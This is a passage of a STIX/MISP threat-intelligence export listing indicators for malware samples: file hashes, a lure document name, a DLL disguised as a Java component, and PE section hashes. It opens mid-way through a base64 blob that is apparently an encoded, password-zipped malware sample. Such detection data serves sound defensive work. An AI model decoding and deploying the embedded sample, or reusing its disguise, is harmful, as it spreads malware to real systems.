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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:09:07Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--46037d3e-727a-4508-8dcb-d10de58a764f",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-19T19:06:06.000Z",
"modified": "2020-07-19T19:06:06.000Z",
"pattern": "[file:hashes.MD5 = 'dfb1fd17182503b2f15fbf6c5c30ff71' AND file:hashes.SHA1 = '4bc94298f3b7a33768718ea309f9223d3aef3250' AND file:hashes.SHA256 = '1e4cdfc57086203dce60611c3a7397399199962dc4bd4fa984b0ff0a27f8c3a9' AND file:hashes.SHA512 = '58a340497a5d8c5f2531ba67c6e2eef63768cd7cfff5cd72bbc23104f3e98ceb676e0ce369b7310f43a42aba08884bee26797cf79f1d56d38d11922f6d18ab05' AND file:hashes.SSDEEP = '384:xkHY4guhZuogdd+KEiCZfl/yGFj0KdHf4gphQTDHzJ8k6X5ihHfzwyU/9tRKhD27:f4JhymiCz/7mk3QHHaXIhLJUpKMsm' AND file:name = 'pse.bin' AND file:size = '280078' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-19T19:06:06Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--612fb261-eeee-4173-a89d-074aad7c64d2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-19T23:55:16.000Z",
"modified": "2020-07-19T23:55:16.000Z",
"pattern": "[file:hashes.MD5 = 'db91c4531aa46ce160a71b9c74c800bb' AND file:hashes.SHA1 = 'cf45535c5d392bfd58fb385edb46798d64793d98' AND file:hashes.SHA256 = '076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab' AND file:name = 'rvhz1.dll' AND file:size = '376832' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-19T23:55:16Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--513494bf-37dd-4704-a5ea-15155c29c4fc",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-20T00:00:57.000Z",
"modified": "2020-07-20T00:00:57.000Z",
"pattern": "[file:hashes.MD5 = 'db91c4531aa46ce160a71b9c74c800bb' AND file:hashes.SHA1 = 'cf45535c5d392bfd58fb385edb46798d64793d98' AND file:hashes.SHA256 = '076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab' AND file:hashes.SHA512 = 'ef843483c3f097617850b88146de88e5758841a6442d8097483a082717aeef48c4ba02f7320671378efd28afd1c1245e0207140be3c255e7470925d86e3b1bd8' AND file:hashes.SSDEEP = '6144:krMZ//+TcHKiFX1F5UsCj+2s4wsMAAJb7WjMAuk5XalWUdc2Cb:Dt+TcVFF5TUU4wtb7WgAr545e' AND file:name = 'rvhz1.dll' AND file:size = '376832' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-20T00:00:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-20T00:03:42.000Z",
"modified": "2020-07-20T00:03:42.000Z",
"pattern": "[file:hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:hashes.SHA1 = '5dc20661046ffa7cca66eb047ee01abc3ef935fa' AND file:hashes.SHA256 = 'f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6' AND file:name = 'cannot_but_soft.xsl' AND file:size = '7334' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'cannot_but_soft.xsl' AND file:content_ref.hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-20T00:03:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7b2b9772-9059-4651-84e8-bc066e15b917",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:54.000Z",
"modified": "2020-08-02T18:50:54.000Z",
"pattern": "[file:hashes.MD5 = '3994131da9d08aa5ca8b4fc671d4c9db' AND file:hashes.SHA1 = '55fc3f8108e5a563ea00cd3abc9a5672d3d58ec5' AND file:hashes.SHA256 = 'e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3' AND file:hashes.SHA512 = '02fd82498bef4442ca0a6a5348a9f612c852e901522ec8c69d7f1dfdbe2607cc72bbb727c474e60314b1c5bb5c621a3347b87bb3c92ca2c194473e58debfd1a1' AND file:hashes.SSDEEP = '6144:BKzJkuYHxK6BGiK1kz6q3Gy+2GcsIUo8Ewqbwk9oSp:Azr8jBoij+2G0BDwkoSp' AND file:name = '123.bin' AND file:size = '212992' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:54.000Z",
"modified": "2020-08-02T18:50:54.000Z",
"pattern": "[file:hashes.MD5 = '3994131da9d08aa5ca8b4fc671d4c9db' AND file:hashes.SHA1 = '55fc3f8108e5a563ea00cd3abc9a5672d3d58ec5' AND file:hashes.SHA256 = 'e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3' AND file:hashes.SHA512 = '02fd82498bef4442ca0a6a5348a9f612c852e901522ec8c69d7f1dfdbe2607cc72bbb727c474e60314b1c5bb5c621a3347b87bb3c92ca2c194473e58debfd1a1' AND file:hashes.SSDEEP = '6144:BKzJkuYHxK6BGiK1kz6q3Gy+2GcsIUo8Ewqbwk9oSp:Azr8jBoij+2G0BDwkoSp' AND file:name = '123.bin' AND file:size = '212992' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9bb216ae-af15-4cba-9d65-40be296d9438",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-03T00:46:32.000Z",
"modified": "2020-08-03T00:46:32.000Z",
"pattern": "[file:hashes.MD5 = '0a4fd937473fd2731569d1a39411477e' AND file:hashes.SHA1 = 'cfb9390326c41ac0e81b0274386bae21c53307b1' AND file:hashes.SHA256 = 'e3589aa5d687e58ee97bda2c501bcba9d5e942fe929644602dd1645b3c7f0e94' AND file:name = 'July2020_2485413825.doc' AND file:size = '623616' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T00:46:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--aec61910-1c29-47c5-88c9-37621ded62dd",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:09:07.000Z",
"modified": "2020-07-15T20:09:07.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451982' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-15T23:22:28+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:09:07Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:47.000Z",
"modified": "2020-08-02T18:50:47.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:47Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:54.000Z",
"modified": "2020-08-02T18:50:54.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--0537282b-b524-441b-bc04-7b894b342a40",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:00:03.000Z",
"modified": "2020-07-15T20:00:03.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdar",
"category": "Other",
"uuid": "3f9c0725-773e-43c0-804f-d684b03092c9"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "16384",
"category": "Other",
"uuid": "0b837526-f8e1-4bcd-8ecb-329f516930ae"
},
{
"type": "float",
"object_relation": "entropy",
"value": "6.5945206832312",
"category": "Other",
"uuid": "fbbaae3e-27eb-4cd8-99da-a6f55838909d"
},
{
"type": "md5",
"object_relation": "md5",
"value": "5963427cd562179e2c2225fa6e8bb5d5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "06c32bde-5608-47c4-a4fd-6ae4cc465b2e"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "5aea9aa2fbb76756ca7608fb2f0b50872cf9a919",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2b7f6066-6112-4600-8489-d0acf3c87394"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "0384f96cf8498309325a168041880d52e9624f023a620316a7e4ffb94a20be92",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e657a30a-27c8-466a-978b-459476309d8e"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "2d1f364720fa192a1cdd1ea3c9f5febce804f172929447f42dc66105fe9b5b65a06484dce3284bec79997ef4df3d6870aa86713d3305996bab4e7ccdd0fdbcac",
"category": "Payload delivery",
"to_ids": true,
"uuid": "bf8b548b-1636-44e5-a5ee-2301f3e296d8"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "192:bFGZboRzZ9QmDg//fOCVa/ott0dfwUVqFGN4W7OlKA8rof7/tpSEgxUajpiXjmIV:EB8ZvZbDdTTAf4owGI2Ee",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6c94b9e8-233a-42f8-8734-9537e202d765"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:01:15.000Z",
"modified": "2020-07-15T20:01:15.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdata",
"category": "Other",
"uuid": "6cd4c038-ba0d-4603-ac3a-09673ea84425"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "118784",
"category": "Other",
"uuid": "b7f88d7f-93cc-4743-a1cd-170663465e33"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9827191322039",
"category": "Other",
"uuid": "61f2e657-07fc-4915-8b08-289f836cacda"
},
{
"type": "md5",
"object_relation": "md5",
"value": "edd63a0a668eb9c4231cdd5e0c81a044",
"category": "Payload delivery",
"to_ids": true,
"uuid": "401e2bf6-1ca8-4f40-acd8-9cb535d8309d"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "a1238d408a37574e5525d9b9a820398f4d7ef82a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "d7c0a094-afd8-4622-84d2-c18da9ff5c27"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "bfdb1a8c3324799ae08883d1298961f885a93ba5706f87a51f0434f847f4632a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a1cfaabe-9bd2-4246-9e10-48dd45e63dc9"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "b8d20414f732017b2274a74cab74d109ebcb9ba7fbb5280f6bb33046994f1565a4ef0b928158fbc3e86a8b49dc4f00a1c1b30c01dfc89184f7f30acec5fb222c",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7ded34a2-3ce7-41d7-832d-83a91f4eddc6"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3072:KcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESR:f6hB5gBZ74XQN99R",
"category": "Payload delivery",
"to_ids": true,
"uuid": "304a3fab-c5d1-4867-97ca-0efcbab42b49"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:02:26.000Z",
"modified": "2020-07-15T20:02:26.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".data",
"category": "Other",
"uuid": "8065b3ba-8707-4d21-b142-9ce4ca830386"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "69632",
"category": "Other",
"uuid": "b425d073-04ea-42b5-a609-c1e85546562d"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9479643160405",
"category": "Other",
"uuid": "6e7e11d3-86de-4136-bdbe-33cedbdafa36"
},
{
"type": "md5",
"object_relation": "md5",
"value": "6d3bca57196c0913e08a876821f385e0",
"category": "Payload delivery",
"to_ids": true,
"uuid": "efa13f3c-4693-4a33-b9b1-933aff8436ec"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "c67a629ab7662575eb6eac1c4e0a5daaffefdb15",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6866de3c-4f27-4faf-b4e9-2aec6ab16222"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "c5cb63c83c121d594c360584caf2a30fe7c5bed096d1abc5f9116e1e4f8113e0",
"category": "Payload delivery",
"to_ids": true,
"uuid": "71cb2ef1-4b3f-4c77-b912-7a78eefc8a1a"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "77143be8adb6e39cbdc21e8d9458d3fe6ffc36ebd9aa764e7b9e1e6e6e77eb6240fae09c2b321ea45dab580639b7766a1262b36499b0a75a90b81e0b55dae1ba",
"category": "Payload delivery",
"to_ids": true,
"uuid": "295f465b-62ea-43c6-8c60-41cf82e98820"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "1536:8lnx8E/msg8/rWJWVPRENX/HJSz+t95r49XAkr+it+a:gnxxgSrYGRQJSwrru",
"category": "Payload delivery",
"to_ids": true,
"uuid": "d5561dc5-6e15-4b06-9c39-5aff4909045c"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:03:50.000Z",
"modified": "2020-07-15T20:03:50.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "6bdc308a-64c9-4365-8af4-6fcecc71d572"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "27f5226b-29e3-4d36-814e-92917d4d555b"
},
{
"type": "float",
"object_relation": "entropy",
"value": "3.3548995614289",
"category": "Other",
"uuid": "fea91540-ab3a-41e2-87c5-dea257aede25"
},
{
"type": "md5",
"object_relation": "md5",
"value": "f3cf17707906ead98cbc9697b3b73c5f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7c8a4b53-3bb3-4324-8756-6fe35a8cc64a"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "8c280ae153325f85cd4a869f8116e9e3df0dc812",
"category": "Payload delivery",
"to_ids": true,
"uuid": "62471cbc-61e2-45d1-aefa-6f9d3d4c243f"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "69aff97d63b9f106ab4b318358d260968629056e693f19f01e5001d023fb1f86",
"category": "Payload delivery",
"to_ids": true,
"uuid": "f352baed-150a-4ff4-8745-0c274900bf0a"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "6f52b4198600889d50961a88446854ab1e7dd877c2c91f2a39a3052b4059e2ff31ae6ac9a82d5777e4fe84d18598abcd0200b1f3e4449e34b9c1d191935d57b8",
"category": "Payload delivery",
"to_ids": true,
"uuid": "57726d99-3ff8-4331-9c22-fb9cc3c30762"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:E71i3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:TA1YFSlel1NzHN/m93Jl/KPN3ND",
"category": "Payload delivery",
"to_ids": true,
"uuid": "26d752ad-7355-4070-8ccd-b09642a166c1"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:05:10.000Z",
"modified": "2020-07-15T20:05:10.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "f3c0c1bf-c85a-4ba4-99a5-0373d70552cc"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "33f360e2-e3f4-4474-9fa2-fe385c72ac96"
},
{
"type": "float",
"object_relation": "entropy",
"value": "5.8403314710145",
"category": "Other",
"uuid": "965fd0bc-6b1c-418d-9c6a-419cb3ea8ad8"
},
{
"type": "md5",
"object_relation": "md5",
"value": "1b5b73978c9dd2b41ffb6503bbce8fa5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "68d5f823-7a9f-4c5e-9ee5-59326f0edc3e"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "8902587665c7be53c1803817feebd8982a1fce88",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7d949797-4652-4952-837c-fdb19b0654d8"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "4de7524bab0b1ee28e73af784430877e43359840645dd5382d9387f758a710c1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "de7fa0ae-9b23-466f-b477-e2061ffca952"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "c9c576f04fe09bfea4e965418cf08009a4f41f3d29529ece5827ebf6f66b1a879211ca4e7e8e046cde9238bb09ebba817dd5ec92f1442483ef613c062e6a79fa",
"category": "Payload delivery",
"to_ids": true,
"uuid": "13d0a6df-7d20-44c6-8289-475d62e967a6"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:/qtWjpmzSlZzY1zwkUdU0UX0rojXU84jv:/qkQ2lZzY1zwDCfjX3cv",
"category": "Payload delivery",
"to_ids": true,
"uuid": "60b6d300-9272-4596-a355-fd46e2f39e51"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:39:23.000Z",
"modified": "2020-08-02T18:39:23.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdar",
"category": "Other",
"uuid": "e2ec184c-a31f-4ade-ae4c-642a7e65c614"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
